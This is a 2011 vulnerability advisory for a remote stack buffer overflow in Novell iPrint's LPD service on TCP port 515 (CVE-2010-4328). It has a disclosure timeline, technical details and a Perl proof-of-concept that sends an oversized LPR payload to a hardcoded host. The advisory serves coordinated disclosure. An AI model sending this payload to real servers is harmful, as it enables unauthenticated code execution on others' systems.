##################################################################################### Application: Novell Iprint LPD Remote Code Execution Vulnerability Platforms: Linux Exploitation: Remote code execution CVE Number: CVE-2010-4328 Novell TID: 7007858. ZDI: ZDI-11-087 {PRL}: 2011-01 Author: Francis Provencher (Protek Research Lab's) Blog: http://www.protekresearchlab.com/ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) The Code ##################################################################################### =============== 1) Introduction =============== Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients. (http://en.wikipedia.org/wiki/Novell) ##################################################################################### ============================ 2) Report Timeline ============================ 2010-12-01 - Vulnerability reported to vendor 2011-02-16 - Coordinated public release of advisory ##################################################################################### ============================ 3) Technical details ============================ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell iPrint Server. Authentication is not required to exploit this vulnerability. The flaw exists within the '/opt/novell/iprint/bin/ipsmd' component this component communicates with 'ilprsrvd' which listens on TCP port 515. When handling multiple LPR opcodes the process blindly copies user supplied data into a fixed-length buffer on the stack. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the iprint user. ##################################################################################### =========== 4) POC =========== #!/usr/bin/perl use Getopt::Std; use IO::Socket::INET; $SIG{INT} = \&abort; my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCK_STREAM; my $timeout = 1; my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", \%opt ); if (defined $opt{h}) { usage() } my @commands = ( {Command => 'Send', Data => "\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x43\x42\x41\x0a"}, ); my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, Proto => $proto, Type => $sockType, Timeout => $timeout, ) or die "socket error: $!\n\n"; print "connected to: $host:$port\n"; $sock->autoflush(1); binmode $sock; foreach my $command (@commands) { if ($command->{'Command'} eq 'Receive') { my $buf = receive($sock, $timeout); if (length $buf) { print "received: [$buf]\n"; } } elsif ($command->{'Command'} eq 'Send') { print "sending: [".$command->{'Data'}."]\n"; send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n"; } } close ($sock);